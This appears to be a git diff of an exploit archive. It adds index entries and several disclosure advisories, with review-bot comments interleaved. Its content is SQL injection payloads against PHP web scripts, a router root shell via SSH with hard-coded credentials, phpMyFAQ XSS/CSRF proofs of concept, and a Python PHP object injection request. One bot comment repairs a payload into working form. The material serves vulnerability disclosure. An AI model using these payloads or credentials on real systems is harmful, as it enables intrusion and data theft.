 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
@@ -35207,7 +35208,7 @@ id,file,description,date,author,platform,type,port
 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition - 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0
 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 - Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80
 36000,platforms/php/webapps/36000.txt,"HP Network Automation 9.10 - SQL Injection",2011-07-28,anonymous,php,webapps,0
-36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Open Redirection",2011-07-28,"Tom Neaves",asp,webapps,0
+36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Open Redirection",2011-07-28,"Tom Neaves",asp,webapps,0
 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0
 36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Cross-Site Scripting Multiple Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0
 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' SQL Injection",2011-08-02,"AutoRUN & dR.sqL",php,webapps,0
@@ -35542,7 +35543,7 @@ id,file,description,date,author,platform,type,port
 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
 36490,platforms/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
-36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Open Redirection",2012-01-04,"Mesut Timur",php,webapps,0
+36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Open Redirection",2012-01-04,"Mesut Timur",php,webapps,0
 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0
 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' SQL Injection",2011-12-29,SiteWatch,php,webapps,0
 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0
@@ -35767,7 +35768,7 @@ id,file,description,date,author,platform,type,port
 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
 36805,platforms/php/webapps/36805.txt,"WordPress Plugin Community Events 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0
 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
-36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Open Redirection",2012-02-18,sonyy,php,webapps,0
+36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Open Redirection",2012-02-18,sonyy,php,webapps,0
 36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'get.php?v' Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0
 36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'userlogdetail.php?idclient' SQL Injection",2012-02-20,"J. Greil",php,webapps,0
 36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Cross-Site Scripting Multiple Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0
@@ -36216,7 +36217,7 @@ id,file,description,date,author,platform,type,port
 37484,platforms/php/webapps/37484.txt,"WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0
 37485,platforms/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0
 37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Local File Inclusion",2012-07-06,dun,php,webapps,0
-37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Open Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0
+37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Open Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0
 37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injections",2012-07-09,"Stefan Schurtz",php,webapps,0
 37563,platforms/php/webapps/37563.html,"WordPress Plugin G-Lock Double Opt-in Manager - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0
 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Injection",2015-07-05,Vulnerability-Lab,ios,webapps,0
@@ -36251,7 +36252,7 @@ id,file,description,date,author,platform,type,port
 37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
 37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
-37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Open Redirection",2012-07-29,"Aung Khant",php,webapps,0
+37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Open Redirection",2012-07-29,"Aung Khant",php,webapps,0
 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Cross-Site Scripting Multiple Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0
 37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0
 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0
@@ -36406,7 +36407,7 @@ id,file,description,date,author,platform,type,port
 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - 'article.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0
 37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0
-37945,platforms/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' Open Redirection",2012-10-15,"Aung Khant",php,webapps,0
+37945,platforms/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' Open Redirection",2012-10-15,"Aung Khant",php,webapps,0
 37946,platforms/php/webapps/37946.txt,"WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0
 37801,platforms/hardware/webapps/37801.sh,"Sagemcom F@ST 3864 V2 - Get Admin Password",2015-08-17,"Cade Bull",hardware,webapps,0
 37802,platforms/jsp/webapps/37802.html,"IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities",2012-09-15,MustLive,jsp,webapps,0
@@ -38754,3 +38755,45 @@ id,file,description,date,author,platform,type,port
 43052,platforms/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps,0
 43053,platforms/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
 43054,platforms/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
+43062,platforms/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",php,webapps,0
+43063,platforms/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",php,webapps,0
+43064,platforms/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",php,webapps,0
+43065,platforms/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,php,webapps,0
+43066,platforms/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43067,platforms/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43068,platforms/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43069,platforms/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
+43070,platforms/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43071,platforms/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43072,platforms/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43073,platforms/php/webapps/43073.txt,"CPA Lead Reward Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43074,platforms/php/webapps/43074.txt,"Basic B2B Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43075,platforms/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43076,platforms/php/webapps/43076.txt,"MyMagazine 1.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43077,platforms/php/webapps/43077.txt,"News 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43078,platforms/php/webapps/43078.txt,"Newspaper 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43079,platforms/php/webapps/43079.txt,"US Zip Codes Database - 'state' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43080,platforms/php/webapps/43080.txt,"Shareet - 'photo' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43081,platforms/php/webapps/43081.txt,"AROX School ERP PHP Script - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43082,platforms/php/webapps/43082.txt,"Protected Links - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43083,platforms/php/webapps/43083.txt,"ZeeBuddy 2x - 'groupid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43084,platforms/php/webapps/43084.txt,"Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43085,platforms/php/webapps/43085.txt,"tPanel 2009 - Authentication Bypass",2017-10-30,"Ihsan Sencan",php,webapps,0
+43086,platforms/php/webapps/43086.txt,"Sokial Social Network Script 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43087,platforms/php/webapps/43087.txt,"SoftDatepro Dating Social Network 1.3 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43088,platforms/php/webapps/43088.txt,"Same Sex Dating Software Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43089,platforms/php/webapps/43089.txt,"PHP CityPortal 2.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43090,platforms/php/webapps/43090.txt,"PG All Share Video 1.0 - 
SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43091,platforms/php/webapps/43091.txt,"MyBuilder Clone 1.0 - 'subcategory' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43092,platforms/php/webapps/43092.txt,"Mailing List Manager Pro 3.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43093,platforms/php/webapps/43093.txt,"Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43094,platforms/php/webapps/43094.txt,"Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43095,platforms/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43096,platforms/php/webapps/43096.txt,"iTech Gigs Script 1.21 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43097,platforms/php/webapps/43097.txt,"iStock Management System 1.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
+43098,platforms/php/webapps/43098.txt,"iProject Management System 1.0 - 'ID' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43099,platforms/php/webapps/43099.txt,"Article Directory Script 3.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43100,platforms/php/webapps/43100.txt,"Adult Script Pro 2.2.4 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43101,platforms/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
+43102,platforms/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
+43103,platforms/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps,0
diff --git a/platforms/hardware/remote/43061.txt b/platforms/hardware/remote/43061.txt
new file mode 100755
index 000000000..669da011f
--- /dev/null
+++ b/platforms/hardware/remote/43061.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Privilege escalation MitraStar routers
+# Date: 28-10-2017
+# Exploit Author: j0lama
+# Vendor Homepage: http://www.mitrastar.com/
+# Provider Homepage: https://www.movistar.com/
+# Models affected: MitraStar DSL-100HN-T1 and MitraStar GPT-2541GNAC (HGU)
+# Software versions: ES_113WJY0b16 (DSL-100HN-T1) and 1.00(VNJ0)b1 (GPT-2541GNAC)
+# Vulnerability analysis: http://jolama.es/temas/router-attack/index.php
+
+Description
+-----------
+SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us.
+
+$ ssh 1234@ip /bin/sh
+
+This give us a shell with root permissions.
+
+Note: the password for 1234 user is under the router.
+
+You can copy all file system to your local machine using scp.
+In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root).
+
+
+Solution
+--------
+In the latest firmware versions this have been fixed.
+If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before.
diff --git a/platforms/php/webapps/43062.txt b/platforms/php/webapps/43062.txt
new file mode 100755
index 000000000..5d66a0703
--- /dev/null
+++ b/platforms/php/webapps/43062.txt
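Review bot: The Solution section says only that "the latest firmware versions" fix this, without naming a fixed build, so a reader cannot tell whether ES_113WJY0b16 and 1.00(VNJ0)b1 listed in the header are the last vulnerable versions or what to compare against; a `# Fixed in:` header line (or an explicit "no fixed version known") is needed. The write-up also never names the misconfiguration: `ssh 1234@ip /bin/sh` appears to work because sshd runs whatever command the client supplies instead of forcing the restricted shell, so the mitigation to state is a forced command (sshd `ForceCommand`) or a login shell that rejects remote commands, not just the symptom. The zyad1234/zyad1234 account is a separate hard-coded-credential issue and should get its own sentence saying whether the same update removes it. Finally, the last sentence only says that scp now copies the configuration file rather than arbitrary files, which suggests the file-system read was restricted but leaves open whether the command-execution bypass itself is closed; that distinction should be spelled out.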
@@ -0,0 +1,18 @@
+###################################################
+[+] Author : Venkat Rajgor
+[+] Email : Venki9990@gmail.com
+[+] Vulnerability : SQL injection
+###################################################
+E-mail ID : support@phpsugar.com
+Download : http://www.phpsugar.com
+Web : http://www.phpsugar.com
+Price : $39 USD
+###################################################
+Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
+Application : PHPSUGAR PHP Melody version 2.6.1
+Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
+###################################################
+
+Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
+
+Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -
\ No newline at end of file
diff --git a/platforms/php/webapps/43063.txt b/platforms/php/webapps/43063.txt
new file mode 100755
index 000000000..91cd6fcaf
--- /dev/null
+++ b/platforms/php/webapps/43063.txt
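Review bot: The `Payload Used` line is broken by stray whitespace that looks like mail-client wrapping: `0x223c2f613e3c2f64 69763e3c2f6469763e`, `0 x3c212d2d` and `null,null,null,null ,null` are not valid MySQL as written, so the PoC cannot be used as pasted. The intended line appears to be `' UNION SELECT null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),null,null,null,null,null,null,null,null,null-- -` (eleven columns; the two hex literals decode to `"</a></div></div>` and `<!--`), and the file should say so explicitly rather than leave the reader to reassemble it. The advisory also carries no CVE, no fixed version and no vendor response, so it is impossible to tell whether 2.6.1 is still the shipping release.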
@@ -0,0 +1,41 @@ +# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability +# Date: 28-9-2017 +# Exploit Author: Nikhil Mittal (Payatu Labs) +# Vendor Homepage: http://www.phpmyfaq.de/ +# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip +# Version: 2.9.8 +# Tested on: MAC OS +# CVE : 2017-15727 + +1. Description + +In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment. + +2. Proof of concept + +Exploit code + + + + + XSS EXPLOIT + + + + + + + + +Steps to reproduce: + +1. Create a user having limited access rights to attachment section +2. Goto http://localhost/phpmyfaq/admin/?action=editentry +2. Upload the exploit code with .html extension at the place of attachements +3. Access the file url generated at /phpmyfaq/attachments/ +4. Reach to last file using directory traversal and XSS will triage + +3. Solution + +Update to phpMyFAQ Version 2.9.9 +http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip diff --git a/platforms/php/webapps/43064.txt b/platforms/php/webapps/43064.txt new file mode 100755 index 000000000..042118eed --- /dev/null +++ b/platforms/php/webapps/43064.txt @@ -0,0 +1,29 @@ +# Exploit Title: phpMyFAQ 2.9.8 CSRF Vulnerability +# Date: 27-9-2017 +# Exploit Author: Nikhil Mittal (Payatu Labs) +# Vendor Homepage: http://www.phpmyfaq.de/ +# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip +# Version: 2.9.8 +# Tested on: MAC OS +# CVE : 2017-15730 + +1. Description + +In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php. + +2. Proof of concept + + + + PHPMYSQL CSRF EXPLOIT + + + EXPLOIT! + + + + +3. Solution + +Update to phpMyFAQ Version 2.9.9 +http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip \ No newline at end of file diff --git a/platforms/php/webapps/43065.py b/platforms/php/webapps/43065.py new file mode 100755 index 000000000..4a824f83e --- /dev/null +++ b/platforms/php/webapps/43065.py 
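Review bot: The reproduction steps are not followable as written: step 4, "Reach to last file using directory traversal and XSS will triage", names neither the URL that is opened nor what "directory traversal" means here (listing `/phpmyfaq/attachments/` to locate the uploaded file, presumably), and the HTML PoC body is not legible on this page beyond its `XSS EXPLOIT` title. The steps should give the exact attachment URL that triggers the payload and the minimal file content, e.g. `<script>alert(document.domain)</script>`, so the finding can be retested after the 2.9.9 update. The precondition should also be stated precisely: the attacker needs an account with the attachment-upload right, so this is a post-authentication stored XSS against whoever opens the attachment from the application origin. `# CVE : 2017-15727` should use the canonical `CVE-2017-15727` form so indexers pick it up.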
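Review bot: The affected range in the Description contradicts the header: it says "In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php", while the title and `# Version:` line say 2.9.8 is vulnerable and the Solution is to update to 2.9.9, so the sentence should read `In phpMyFAQ before 2.9.9, ...`. The PoC form is not legible on this page beyond its title, so the text should spell out the request it submits (target URL, method, parameters) and what state change it causes, plus the precondition that a logged-in administrator must visit the attacker's page; the title string `PHPMYSQL CSRF EXPLOIT` also looks like a typo for phpMyFAQ. As in the companion XSS advisory, `# CVE : 2017-15730` should be written `CVE-2017-15730`.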
@@ -0,0 +1,66 @@
+# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
+# Google Dork: [NA]
+# Date: [Okt 30 2017]
+# Exploit Author: [tomplixsee]
+# Author blog : [cupuzone.wordpress.com]
+# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
+# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
+# Version: [<= 4.2.24]
+# Tested on: [Ubuntu Server 16.04]
+# CVE : [NA]
+
+tested on app version 4.2.23, 4.2.24
+
+we can send an evil cookie (login not required) to vulnerable function
+1. vulnerable code on Functions/Process_Ajax.php <= tested
+
+ 203 // Adds an item to the plugin's cart
+ 204 function UPCP_Add_To_Cart() {
+ 205 global $woocommerce;
+ 206 global $wpdb;
+ 207 global $items_table_name;
+ 208
+ 209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
+ 210
+ 211 if ($WooCommerce_Checkout == "Yes") {
+ 212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
+ 213 echo "WC ID: " . $WC_Prod_ID . "
";
+ 214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
+ 215 }
+ 216
+ 217 if (isset($_COOKIE['upcp_cart_products'])) {
+ 218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
+ 219 }
+ 220 else {
+ 221 $Products_Array = array();
+ 222 }
+ 223
+ 224 $Products_Array[] = $_POST['prod_ID'];
+ 225 $Products_Array = array_unique($Products_Array);
+ 226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
+ 227 }
+ 228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
+ 229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
+
+2. vulnerable code on Functions/Shortcodes.php <= not tested
+
+POC
+1. use a WP plugin to test php object injection,
+like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
+
+2. make a request
+#-----------------------------------
+#! /usr/bin/python
+import requests
+url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
+data = {'action':'upcp_add_to_cart'}
+headers = {
+'Content-type': 'application/x-www-form-urlencoded',
+'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
+'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
+}
+r = requests.post(url, data=data, headers=headers)
+
+print r.content
+
+#------------------------------------
\ No newline at end of file
diff --git a/platforms/php/webapps/43066.txt b/platforms/php/webapps/43066.txt
new file mode 100755
index 000000000..8fea852e4
--- /dev/null
+++ b/platforms/php/webapps/43066.txt
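Review bot: The script as committed does not run as a file: the `#! /usr/bin/python` line sits at line 53 behind the advisory text instead of line 1, `print r.content` is Python 2 only, and `url` is a hard-coded lab host with a stray `;` and a trailing `?`. Two small changes make it usable: take the target from the command line with `url = sys.argv[1].rstrip("/") + "/wp-admin/admin-ajax.php"` (after `import sys`) and print with `print(r.content)`. The text should also state the root cause plainly — the `unserialize()` of the attacker-controlled `upcp_cart_products` cookie on line 218, reachable without login through the `wp_ajax_nopriv_upcp_add_to_cart` hook on line 229 — and the fix, which is to store the cart as JSON (`json_encode`/`json_decode`) or validate it as a list of integer IDs rather than unserialize it. A PoC against the benign `PHP_Object_Injection` test class only proves that the unserialize call is reachable, not that an exploitable gadget chain exists, and the `Shortcodes.php` path is explicitly "not tested", so both caveats belong in the write-up.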
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: Zomato Clone Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script
+# Demo: http://jhinstitute.com/demo/foodpanda/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15993
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL]
+#
+# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+-
+#
+# Parameter: resid (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: resid=-9239 OR 3532=3532#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: resid=539 AND SLEEP(5)
+#
+# Type: UNION query
+# Title: MySQL UNION query (87) - 10 columns
+# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87#
+#
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/43067.txt b/platforms/php/webapps/43067.txt
new file mode 100755
index 000000000..fdd664c54
--- /dev/null
+++ b/platforms/php/webapps/43067.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: Website Broker Script - 'status_id' Parameter SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/UwCG4464436/php-scripts/website-broker-script
+# Demo: http://www.officialwebsiteforsale.com/official/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15992
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/status_list.php?status_id=[SQL]
+#
+# -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+-
+#
+# Parameter: status_id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 5 columns
+# Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43068.txt b/platforms/php/webapps/43068.txt
new file mode 100755
index 000000000..d31de72b6
--- /dev/null
+++ b/platforms/php/webapps/43068.txt
@@ -0,0 +1,66 @@
+# # # # #
+# Exploit Title: Vastal I-Tech Agent Zone - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://vastal.com/
+# Software http://vastal.com/agent-zone-real-estate-script.html
+# Demo: http://agentzone.vastal.com/demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15991
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/searchCommercial.php?property_type=[SQL]&city=[SQL]&posted_by=[SQL]
+#
+# http://localhost/[PATH]/searchResidential.php?property_type=[SQL]&city=[SQL]&bedroom=[SQL]
+#
+# Parameter: city (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: property_type=&city=-5275 OR 1703=1703#&posted_by=
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: property_type=&city=-1769 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (2860=2860) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by=
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
